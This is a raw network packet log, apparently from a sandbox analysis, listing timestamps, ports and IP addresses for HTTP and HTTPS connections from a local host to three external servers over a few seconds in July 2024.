Jul 27, 2024 07:30:09.326917887 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.326941967 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.326941967 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.326941967 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.326941967 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.326941967 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.326941967 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.327044010 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.327672958 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.327682018 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.327691078 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.327702045 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.327712059 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.327722073 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.327732086 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.327742100 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.327753067 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.327763081 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.327773094 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.327784061 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.327841997 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.327841997 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.327841997 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.327841997 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.327841997 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.327841997 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.369498014 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.369510889 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.369523048 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.369632959 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.369645119 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.369657040 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.369671106 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.369748116 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.369748116 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.369748116 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.369775057 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.369829893 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.409120083 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.409143925 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.409161091 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.409174919 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.409189939 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.409203053 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.409219027 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.409270048 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.409270048 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.409270048 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.409302950 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.409369946 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.409404993 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.409415960 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.409426928 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.409440994 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.409452915 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.409466028 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.409522057 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.409522057 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.409522057 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.409728050 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.409739017 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.409750938 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.409852028 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.409862041 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.409873009 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.409885883 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.409898043 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.409946918 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.409946918 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.409948111 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.409948111 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.410295963 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.410305977 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.410317898 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.410331011 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.410342932 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.410356045 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.410403967 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.410403967 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.410403967 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.410797119 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.410806894 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.410818100 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.410830021 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.410840988 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.410852909 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.410866022 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.410877943 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.410890102 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.410897017 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.410897017 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.410904884 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.410911083 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.410921097 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.410921097 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.410937071 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.410950899 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.410960913 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.410973072 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.410984993 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.410985947 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.410985947 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.410998106 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.411001921 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.411240101 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.411689043 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.411699057 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.411710024 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.411721945 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.411734104 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.411744118 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.411756992 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.411776066 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.411787987 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.411799908 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.411812067 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.411813021 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.411813021 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.411813021 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.411823988 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.411837101 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.411849976 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.411863089 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.411919117 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.411921978 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.411921978 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.411921978 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.411992073 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.412700891 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.412712097 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.412720919 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.412733078 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.412744999 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.412756920 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.412767887 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.412781000 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.412792921 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.412797928 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.412797928 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.412806034 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.412812948 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.412818909 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.412822008 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.412830114 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.412836075 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.412842989 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.412848949 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.412869930 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.413058996 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.413058996 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.413747072 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.413762093 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.413774014 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.413785934 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.413798094 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.413810015 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.413821936 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.413834095 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.413846016 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.413856030 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.413867950 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.413880110 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.413892031 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.413904905 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.413916111 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.413927078 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.413927078 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.413927078 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.413927078 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.413927078 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.413927078 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.413928986 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.413942099 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.413954020 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.414000988 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.414000988 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.414001942 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.414563894 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.414577007 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.414587975 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.414602041 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.414613008 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.414625883 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.414637089 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.414649963 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.414660931 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.414674997 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.414674997 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.414674997 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.414679050 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.414693117 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.414705992 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.414720058 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.414758921 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.414758921 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.414758921 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.456265926 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.456279039 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.456291914 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.456340075 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.456346989 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.456346989 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.456361055 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.456439972 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.456698895 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.456708908 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.456721067 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.456768990 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.496156931 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.496181965 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.496196985 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.496208906 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.496222019 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.496234894 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.496248007 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.496295929 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.496295929 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.496295929 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.496383905 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.496397018 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.496465921 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.567106962 CEST	51809	80	192.168.2.5	125.7.253.10
Jul 27, 2024 07:30:09.572247028 CEST	80	51809	125.7.253.10	192.168.2.5
Jul 27, 2024 07:30:09.572324038 CEST	51809	80	192.168.2.5	125.7.253.10
Jul 27, 2024 07:30:09.573019028 CEST	51809	80	192.168.2.5	125.7.253.10
Jul 27, 2024 07:30:09.573050976 CEST	51809	80	192.168.2.5	125.7.253.10
Jul 27, 2024 07:30:09.577924013 CEST	80	51809	125.7.253.10	192.168.2.5
Jul 27, 2024 07:30:09.577936888 CEST	80	51809	125.7.253.10	192.168.2.5
Jul 27, 2024 07:30:11.104420900 CEST	80	51809	125.7.253.10	192.168.2.5
Jul 27, 2024 07:30:11.104517937 CEST	80	51809	125.7.253.10	192.168.2.5
Jul 27, 2024 07:30:11.104794025 CEST	51809	80	192.168.2.5	125.7.253.10
Jul 27, 2024 07:30:11.104794025 CEST	51809	80	192.168.2.5	125.7.253.10
Jul 27, 2024 07:30:11.107192993 CEST	51810	80	192.168.2.5	125.7.253.10
Jul 27, 2024 07:30:11.109930038 CEST	80	51809	125.7.253.10	192.168.2.5
Jul 27, 2024 07:30:11.112147093 CEST	80	51810	125.7.253.10	192.168.2.5
Jul 27, 2024 07:30:11.112215042 CEST	51810	80	192.168.2.5	125.7.253.10
Jul 27, 2024 07:30:11.112302065 CEST	51810	80	192.168.2.5	125.7.253.10
Jul 27, 2024 07:30:11.112314939 CEST	51810	80	192.168.2.5	125.7.253.10
Jul 27, 2024 07:30:11.117422104 CEST	80	51810	125.7.253.10	192.168.2.5
Jul 27, 2024 07:30:11.117435932 CEST	80	51810	125.7.253.10	192.168.2.5
Jul 27, 2024 07:30:12.626574039 CEST	80	51810	125.7.253.10	192.168.2.5
Jul 27, 2024 07:30:12.626611948 CEST	80	51810	125.7.253.10	192.168.2.5
Jul 27, 2024 07:30:12.626774073 CEST	51810	80	192.168.2.5	125.7.253.10
Jul 27, 2024 07:30:12.627000093 CEST	51810	80	192.168.2.5	125.7.253.10
Jul 27, 2024 07:30:12.629416943 CEST	51811	80	192.168.2.5	125.7.253.10
Jul 27, 2024 07:30:12.631849051 CEST	80	51810	125.7.253.10	192.168.2.5
Jul 27, 2024 07:30:12.634367943 CEST	80	51811	125.7.253.10	192.168.2.5
Jul 27, 2024 07:30:12.634462118 CEST	51811	80	192.168.2.5	125.7.253.10
Jul 27, 2024 07:30:12.634613991 CEST	51811	80	192.168.2.5	125.7.253.10
Jul 27, 2024 07:30:12.634649038 CEST	51811	80	192.168.2.5	125.7.253.10
Jul 27, 2024 07:30:12.639797926 CEST	80	51811	125.7.253.10	192.168.2.5
Jul 27, 2024 07:30:12.639822960 CEST	80	51811	125.7.253.10	192.168.2.5
Jul 27, 2024 07:30:13.895267963 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:13.895333052 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:13.896498919 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:13.901380062 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:14.159498930 CEST	80	51811	125.7.253.10	192.168.2.5
Jul 27, 2024 07:30:14.159513950 CEST	80	51811	125.7.253.10	192.168.2.5
Jul 27, 2024 07:30:14.159694910 CEST	51811	80	192.168.2.5	125.7.253.10
Jul 27, 2024 07:30:14.159787893 CEST	51811	80	192.168.2.5	125.7.253.10
Jul 27, 2024 07:30:14.164562941 CEST	80	51811	125.7.253.10	192.168.2.5
Jul 27, 2024 07:30:14.202758074 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:14.202790022 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:14.202855110 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:14.203285933 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:14.203303099 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:14.968337059 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:14.968429089 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:14.970024109 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:14.970041037 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:14.970372915 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:14.978770971 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:15.024497986 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:15.379148006 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:15.428752899 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:15.521246910 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:15.521284103 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:15.521323919 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:15.521330118 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:15.521337032 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:15.521380901 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:15.521383047 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:15.521392107 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:15.521440983 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:15.522327900 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:15.522367001 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:15.522397995 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:15.522412062 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:15.522425890 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:15.522480011 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:15.664431095 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:15.664453030 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:15.664530993 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:15.664547920 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:15.664592028 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:15.665653944 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:15.665678978 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:15.665715933 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:15.665724039 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:15.665745974 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:15.665767908 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:15.666726112 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:15.666744947 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:15.666801929 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:15.666810989 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:15.666857958 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:15.668356895 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:15.668376923 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:15.668430090 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:15.668437958 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:15.668500900 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:15.806020975 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:15.806041956 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:15.806092978 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:15.806104898 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:15.806137085 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:15.806166887 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:15.806871891 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:15.806895018 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:15.806946993 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:15.806953907 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:15.806993008 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:15.807914019 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:15.807933092 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:15.808007002 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:15.808015108 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:15.808052063 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:15.808618069 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:15.808676958 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:15.808680058 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:15.808692932 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:15.808731079 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:15.808742046 CEST	51812	443	192.168.2.5	185.149.100.242
